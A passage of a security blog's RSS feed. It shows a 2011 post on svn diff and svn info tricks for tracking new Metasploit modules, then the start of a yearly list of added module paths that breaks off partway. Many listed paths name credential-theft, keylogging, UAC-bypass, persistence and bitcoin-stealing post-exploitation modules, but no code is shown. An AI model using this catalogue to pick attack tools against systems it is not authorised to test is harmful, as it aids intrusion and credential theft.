<br /> Tagged: <a href='http://blog.c22.cc/tag/2011/'>2011</a>, <a href='http://blog.c22.cc/tag/blog/'>blog</a>, <a href='http://blog.c22.cc/tag/year-in-review/'>year in review</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/c22blog.wordpress.com/3683/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/c22blog.wordpress.com/3683/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/c22blog.wordpress.com/3683/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/c22blog.wordpress.com/3683/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/c22blog.wordpress.com/3683/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/c22blog.wordpress.com/3683/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/c22blog.wordpress.com/3683/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/c22blog.wordpress.com/3683/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/c22blog.wordpress.com/3683/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/c22blog.wordpress.com/3683/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/c22blog.wordpress.com/3683/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/c22blog.wordpress.com/3683/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/c22blog.wordpress.com/3683/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/c22blog.wordpress.com/3683/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.c22.cc&amp;blog=1599597&amp;post=3683&amp;subd=c22blog&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.c22.cc/2012/01/01/top-5-posts-of-2011/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">ChrisJohnRiley</media:title>
		</media:content>

		<media:content url="http://c22blog.files.wordpress.com/2011/12/2011_cal.jpg" medium="image">
			<media:title type="html">2011_cal</media:title>
		</media:content>
	</item>
		<item>
		<title>Some stuff about SVN</title>
		<link>http://blog.c22.cc/2011/12/31/some_stuff_about_svn/</link>
		<comments>http://blog.c22.cc/2011/12/31/some_stuff_about_svn/#comments</comments>
		<pubDate>Sat, 31 Dec 2011 17:00:47 +0000</pubDate>
		<dc:creator>ChrisJohnRiley</dc:creator>
				<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[svn]]></category>
		<category><![CDATA[tricks]]></category>
		<category><![CDATA[updates]]></category>

		<guid isPermaLink="false">http://blog.c22.cc/?p=3675</guid>
		<description><![CDATA[As I mentioned in my earlier post, the automated Metasploit Modules posts are going the way of the dodo. Still, there are a few things from my automated posts that I didn&#8217;t want to just disappear, mainly because I&#8217;m sure I&#8217;ll forget them if I don&#8217;t post about them. Ignoring all the issues with setting [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.c22.cc&amp;blog=1599597&amp;post=3675&amp;subd=c22blog&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>As I mentioned in my earlier post, the automated Metasploit Modules posts are going the way of the dodo. Still, there are a few things from my automated posts that I didn&#8217;t want to just disappear, mainly because I&#8217;m sure I&#8217;ll forget them if I don&#8217;t post about them. Ignoring all the issues with setting up mutt to email a file at a set time, and getting WordPress to correctly format an emailed HTML file, the main thing I wanted to note was some SVN tricks I picked up while writing my automated shell script. I&#8217;m not sure how well-known or useful these tips are, but here that are anyway, for those that are interested.</p>
<h4>svn diff</h4>
<p>There are various uses for the svn diff command. However for the purposes of automating a list of new modules added to Metasploit I used the diff command to summarize changes to the TRUNK itself.</p>
<p><strong><em>Example</em></strong>:</p>
<blockquote><p>svn diff https://metasploit.com/svn/framework3/trunk &#8211;summarize -r  14450:HEAD &#8211;non-interactive</p>
<p>&#8230;.</p>
<pre>M https://metasploit.com/svn/framework3/trunk/lib/msf/core/rpc/v10/client.rb
M https://metasploit.com/svn/framework3/trunk/lib/msf/core/model/workspace.rb
A https://metasploit.com/svn/framework3/trunk/lib/msf/core/post/windows/shadowcopy.rb
M https://metasploit.com/svn/framework3/trunk/lib/msf/core/auxiliary/report.rb
....</pre>
</blockquote>
<p>This example will output all changes (<strong>A</strong>dditions, <strong>D</strong>eletions, <strong>M</strong>odifications) to the files in the TRUNK between revision 14450 and HEAD (<em>a shortcut for the current revision</em>). This is great, but not everybody happens to remember the revision numbers used on a set date, and although it was useful for automated scripts (<em>simply save the HEAD revision number for use as a starting point in the next script</em>) it doesn&#8217;t lend itself to easily seeing what&#8217;s been changed in the last week/month/year.</p>
<p>So what can we do to get just the last weeks changes&#8230; the -r in the above example can be altered to include a set date as either the start of end point. By putting a date inside <strong>{}</strong> brackets you can see exactly what was  changed in the last week.</p>
<p><em><strong>Example</strong></em>:</p>
<blockquote><p>svn diff https://metasploit.com/svn/framework3/trunk &#8211;summarize -r  {2011-12-24}:{2011-12-31} &#8211;non-interactive</p></blockquote>
<p>We can obviously take this a step further and begin filtering the output for only the newly added scripts using simple regex. I implemented this in a shell script by piping the output to  &#8221;grep &#8216;^A&#8217; | cut -b 8-&#8221; to select only the <strong>A</strong>dditions and remove the preamble from the output.</p>
<h4>svn info</h4>
<p>As an aside, the following command will give you the current revision as well as further information</p>
<blockquote><p>svn info https://metasploit.com/svn/framework3/trunk</p>
<p>&#8230;.</p>
<pre>Path: trunk
URL: https://metasploit.com/svn/framework3/trunk
Repository Root: https://metasploit.com/svn
Repository UUID: 4d416f70-5f16-0410-b530-b9f4589650da
Revision: 14492
Node Kind: directory
Last Changed Author: rapid7
Last Changed Rev: 14492
Last Changed Date: 2011-12-30 23:04:03 +0000 (Fri, 30 Dec 2011)</pre>
</blockquote>
<p>of course, if you just want the Last Changed Rev number, then piping this into &#8220;grep &#8216;^Revision:&#8217; | cut -b 11-&#8221; will give you just the reference number itself.</p>
<p>Well there it is, I hope some of you find it a little useful.</p>
<p>Here&#8217;s to 2012! See you on the other side&#8230;</p>
<br /> Tagged: <a href='http://blog.c22.cc/tag/metasploit/'>Metasploit</a>, <a href='http://blog.c22.cc/tag/svn/'>svn</a>, <a href='http://blog.c22.cc/tag/tricks/'>tricks</a>, <a href='http://blog.c22.cc/tag/updates/'>updates</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/c22blog.wordpress.com/3675/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/c22blog.wordpress.com/3675/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/c22blog.wordpress.com/3675/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/c22blog.wordpress.com/3675/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/c22blog.wordpress.com/3675/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/c22blog.wordpress.com/3675/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/c22blog.wordpress.com/3675/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/c22blog.wordpress.com/3675/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/c22blog.wordpress.com/3675/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/c22blog.wordpress.com/3675/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/c22blog.wordpress.com/3675/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/c22blog.wordpress.com/3675/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/c22blog.wordpress.com/3675/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/c22blog.wordpress.com/3675/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.c22.cc&amp;blog=1599597&amp;post=3675&amp;subd=c22blog&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.c22.cc/2011/12/31/some_stuff_about_svn/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">ChrisJohnRiley</media:title>
		</media:content>
	</item>
		<item>
		<title>Metasploit Modules: A Year in Review</title>
		<link>http://blog.c22.cc/2011/12/31/metasploit-modules-a-year-in-review/</link>
		<comments>http://blog.c22.cc/2011/12/31/metasploit-modules-a-year-in-review/#comments</comments>
		<pubDate>Sat, 31 Dec 2011 15:15:39 +0000</pubDate>
		<dc:creator>ChrisJohnRiley</dc:creator>
				<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[additions]]></category>
		<category><![CDATA[svn]]></category>
		<category><![CDATA[year in review]]></category>

		<guid isPermaLink="false">http://blog.c22.cc/?p=3674</guid>
		<description><![CDATA[A month of so back now I started automating some posts on the new Metasploit modules released. As luck would have it, about the same time, the guys over at Rapid7 started to churn out more regular blog post themselves, giving details of the key modules and changes. Although the posts were interesting to a [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.c22.cc&amp;blog=1599597&amp;post=3674&amp;subd=c22blog&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.metasploit.com"><img class="alignleft" style="margin:8px;" title="msflogo" src="http://c22blog.files.wordpress.com/2011/11/msflogo.png?w=236&#038;h=51" alt="" width="236" height="51" /></a></p>
<p>A month of so back now I started automating some posts on the new Metasploit modules released. As luck would have it, about the same time, the guys over at Rapid7 started to churn out more regular blog post themselves, giving details of the key modules and changes. Although the posts were interesting to a select few, I never saw them as a long-term thing and as the year ticks over to 2012 it&#8217;s time to put them to bed. After all, the people at R7 are bound to have a better overview of Metasploit than I am.</p>
<p>Before it goes though, I took time to output newly added modules between 2011-01-01 and now (2011-12-31)&#8230; just to show what&#8217;s been accomplished in 2011. I&#8217;m sure the fine folks at R7 will be putting out a more detailed review together with pretty charts, and maybe even an Infographic or two. Still, I hope this proves useful for some as we wave goodbye to the automated weekly posts.</p>
<p><strong>Note:</strong> These are only the modules marked as <strong>A</strong>dditions within the modules / tools or scripts directories. Some modules may be excluded and others may appear if they were <strong>D</strong>eleted and re<strong>A</strong>dded at some point in the year. I&#8217;ll be posting up something about how the lists were created in a separate post soon.</p>
<p>The following modules have been added to the Metasploit SVN between 2011-01-01 and 2011-12-31<br />
<span id="more-3674"></span></p>
<ul>
<li><a href="https://metasploit.com/svn/framework3/trunk/test/modules/post/test/services.rb">/test/modules/post/test/services.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/test/modules/post/test/railgun_reverse_lookups.rb">/test/modules/post/test/railgun_reverse_lookups.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/test/modules/post/test/registry.rb">/test/modules/post/test/registry.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/tools/module_rank.rb">/tools/module_rank.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/tools/list_interfaces.rb">/tools/list_interfaces.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/tools/module_changelog.rb">/tools/module_changelog.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/lib/msf/scripts/meterpreter/accounts.rb">/lib/msf/scripts/meterpreter/accounts.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/linux/gather/checkvm.rb">/modules/post/linux/gather/checkvm.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/linux/gather/enum_packages.rb">/modules/post/linux/gather/enum_packages.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/linux/gather/enum_linux.rb">/modules/post/linux/gather/enum_linux.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/linux/gather/enum_cron.rb">/modules/post/linux/gather/enum_cron.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/linux/gather/enum_services.rb">/modules/post/linux/gather/enum_services.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/linux/gather/hashdump.rb">/modules/post/linux/gather/hashdump.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/cisco/gather/enum_cisco.rb">/modules/post/cisco/gather/enum_cisco.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/osx/gather/enum_osx.rb">/modules/post/osx/gather/enum_osx.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/osx/gather/hashdump.rb">/modules/post/osx/gather/hashdump.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/multi/manage/multi_post.rb">/modules/post/multi/manage/multi_post.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/multi/manage/system_session.rb">/modules/post/multi/manage/system_session.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/multi/manage/sudo.rb">/modules/post/multi/manage/sudo.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/multi/gather/ssh_creds.rb">/modules/post/multi/gather/ssh_creds.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/multi/gather/ping_sweep.rb">/modules/post/multi/gather/ping_sweep.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/multi/gather/firefox_creds.rb">/modules/post/multi/gather/firefox_creds.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/multi/gather/dns_bruteforce.rb">/modules/post/multi/gather/dns_bruteforce.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/multi/gather/filezilla_client_cred.rb">/modules/post/multi/gather/filezilla_client_cred.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/multi/gather/dns_srv_lookup.rb">/modules/post/multi/gather/dns_srv_lookup.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/multi/gather/pidgin_cred.rb">/modules/post/multi/gather/pidgin_cred.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/multi/gather/dns_reverse_lookup.rb">/modules/post/multi/gather/dns_reverse_lookup.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/multi/gather/env.rb">/modules/post/multi/gather/env.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/multi/gather/multi_command.rb">/modules/post/multi/gather/multi_command.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/multi/gather/run_console_rc_file.rb">/modules/post/multi/gather/run_console_rc_file.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/multi/gather/thunderbird_creds.rb">/modules/post/multi/gather/thunderbird_creds.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/multi/general/close.rb">/modules/post/multi/general/close.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/escalate/net_runtime_modify.rb">/modules/post/windows/escalate/net_runtime_modify.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/escalate/getsystem.rb">/modules/post/windows/escalate/getsystem.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/escalate/ms10_073_kbdlayout.rb">/modules/post/windows/escalate/ms10_073_kbdlayout.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/escalate/ms10_092_schelevator.rb">/modules/post/windows/escalate/ms10_092_schelevator.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/escalate/bypassuac.rb">/modules/post/windows/escalate/bypassuac.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/escalate/screen_unlock.rb">/modules/post/windows/escalate/screen_unlock.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/escalate/service_permissions.rb">/modules/post/windows/escalate/service_permissions.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/wlan/wlan_profile.rb">/modules/post/windows/wlan/wlan_profile.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/wlan/wlan_current_connection.rb">/modules/post/windows/wlan/wlan_current_connection.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/wlan/wlan_bss_list.rb">/modules/post/windows/wlan/wlan_bss_list.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/wlan/wlan_disconnect.rb">/modules/post/windows/wlan/wlan_disconnect.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/capture/keylog_recorder.rb">/modules/post/windows/capture/keylog_recorder.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/capture/lockout_keylogger.rb">/modules/post/windows/capture/lockout_keylogger.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/recon/resolve_hostname.rb">/modules/post/windows/recon/resolve_hostname.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/recon/computer_browser_discovery.rb">/modules/post/windows/recon/computer_browser_discovery.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/manage/add_user_domain.rb">/modules/post/windows/manage/add_user_domain.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/manage/inject_ca.rb">/modules/post/windows/manage/inject_ca.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/manage/persistence.rb">/modules/post/windows/manage/persistence.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/manage/payload_inject.rb">/modules/post/windows/manage/payload_inject.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/manage/autoroute.rb">/modules/post/windows/manage/autoroute.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/manage/run_as.rb">/modules/post/windows/manage/run_as.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/manage/migrate.rb">/modules/post/windows/manage/migrate.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/manage/nbd_server.rb">/modules/post/windows/manage/nbd_server.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/manage/remove_host.rb">/modules/post/windows/manage/remove_host.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/manage/enable_rdp.rb">/modules/post/windows/manage/enable_rdp.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/manage/pxexploit.rb">/modules/post/windows/manage/pxexploit.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/manage/vss_mount.rb">/modules/post/windows/manage/vss_mount.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/manage/vss_create.rb">/modules/post/windows/manage/vss_create.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/manage/vss_storage.rb">/modules/post/windows/manage/vss_storage.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/manage/delete_user.rb">/modules/post/windows/manage/delete_user.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/manage/remove_ca.rb">/modules/post/windows/manage/remove_ca.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/manage/multi_meterpreter_inject.rb">/modules/post/windows/manage/multi_meterpreter_inject.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/manage/vss_list.rb">/modules/post/windows/manage/vss_list.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/manage/inject_host.rb">/modules/post/windows/manage/inject_host.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/manage/vss_set_storage.rb">/modules/post/windows/manage/vss_set_storage.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/resolve_sid.rb">/modules/post/windows/gather/resolve_sid.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/enum_domains.rb">/modules/post/windows/gather/enum_domains.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/enum_powershell_env.rb">/modules/post/windows/gather/enum_powershell_env.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/win_privs.rb">/modules/post/windows/gather/win_privs.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/memory_grep.rb">/modules/post/windows/gather/memory_grep.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/forensics/enum_drives.rb">/modules/post/windows/gather/forensics/enum_drives.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/forensics/imager.rb">/modules/post/windows/gather/forensics/imager.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/forensics/nbd_server.rb">/modules/post/windows/gather/forensics/nbd_server.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/forensics/duqu_check.rb">/modules/post/windows/gather/forensics/duqu_check.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/enum_termserv.rb">/modules/post/windows/gather/enum_termserv.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/wmic_command.rb">/modules/post/windows/gather/wmic_command.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/enum_ms_product_keys.rb">/modules/post/windows/gather/enum_ms_product_keys.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/dumplinks.rb">/modules/post/windows/gather/dumplinks.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/enum_devices.rb">/modules/post/windows/gather/enum_devices.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/hashdump.rb">/modules/post/windows/gather/hashdump.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/enum_shares.rb">/modules/post/windows/gather/enum_shares.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/enum_dirperms.rb">/modules/post/windows/gather/enum_dirperms.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/enum_applications.rb">/modules/post/windows/gather/enum_applications.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/enum_domain_tokens.rb">/modules/post/windows/gather/enum_domain_tokens.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/smart_hashdump.rb">/modules/post/windows/gather/smart_hashdump.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/checkvm.rb">/modules/post/windows/gather/checkvm.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/enum_ie.rb">/modules/post/windows/gather/enum_ie.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/enum_tokens.rb">/modules/post/windows/gather/enum_tokens.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/enum_domain_group_users.rb">/modules/post/windows/gather/enum_domain_group_users.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/cachedump.rb">/modules/post/windows/gather/cachedump.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/enum_domain.rb">/modules/post/windows/gather/enum_domain.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/credentials/razorsql.rb">/modules/post/windows/gather/credentials/razorsql.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/credentials/enum_cred_store.rb">/modules/post/windows/gather/credentials/enum_cred_store.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/credentials/trillian.rb">/modules/post/windows/gather/credentials/trillian.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/credentials/credential_collector.rb">/modules/post/windows/gather/credentials/credential_collector.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/credentials/imvu.rb">/modules/post/windows/gather/credentials/imvu.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/credentials/enum_picasa_pwds.rb">/modules/post/windows/gather/credentials/enum_picasa_pwds.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/credentials/vnc.rb">/modules/post/windows/gather/credentials/vnc.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/credentials/meebo.rb">/modules/post/windows/gather/credentials/meebo.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/credentials/imail.rb">/modules/post/windows/gather/credentials/imail.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/credentials/outlook.rb">/modules/post/windows/gather/credentials/outlook.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/credentials/nimbuzz.rb">/modules/post/windows/gather/credentials/nimbuzz.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/credentials/dyndns.rb">/modules/post/windows/gather/credentials/dyndns.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/credentials/smartftp.rb">/modules/post/windows/gather/credentials/smartftp.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/credentials/wsftp_client.rb">/modules/post/windows/gather/credentials/wsftp_client.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/credentials/filezilla_server.rb">/modules/post/windows/gather/credentials/filezilla_server.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/credentials/epo_sql.rb">/modules/post/windows/gather/credentials/epo_sql.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/credentials/coreftp.rb">/modules/post/windows/gather/credentials/coreftp.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/credentials/winscp.rb">/modules/post/windows/gather/credentials/winscp.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/credentials/ftpnavigator.rb">/modules/post/windows/gather/credentials/ftpnavigator.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/credentials/mremote.rb">/modules/post/windows/gather/credentials/mremote.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/credentials/total_commander.rb">/modules/post/windows/gather/credentials/total_commander.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/credentials/idm.rb">/modules/post/windows/gather/credentials/idm.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/credentials/flashfxp.rb">/modules/post/windows/gather/credentials/flashfxp.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/credentials/windows_autologin.rb">/modules/post/windows/gather/credentials/windows_autologin.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/arp_scanner.rb">/modules/post/windows/gather/arp_scanner.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/apple_ios_backup.rb">/modules/post/windows/gather/apple_ios_backup.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/enum_chrome.rb">/modules/post/windows/gather/enum_chrome.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/enum_hostfile.rb">/modules/post/windows/gather/enum_hostfile.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/enum_snmp.rb">/modules/post/windows/gather/enum_snmp.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/enum_logged_on_users.rb">/modules/post/windows/gather/enum_logged_on_users.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/reverse_lookup.rb">/modules/post/windows/gather/reverse_lookup.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/enum_computers.rb">/modules/post/windows/gather/enum_computers.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/bitcoin_jacker.rb">/modules/post/windows/gather/bitcoin_jacker.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/enum_services.rb">/modules/post/windows/gather/enum_services.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/screen_spy.rb">/modules/post/windows/gather/screen_spy.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/post/windows/gather/usb_history.rb">/modules/post/windows/gather/usb_history.rb</a></li>
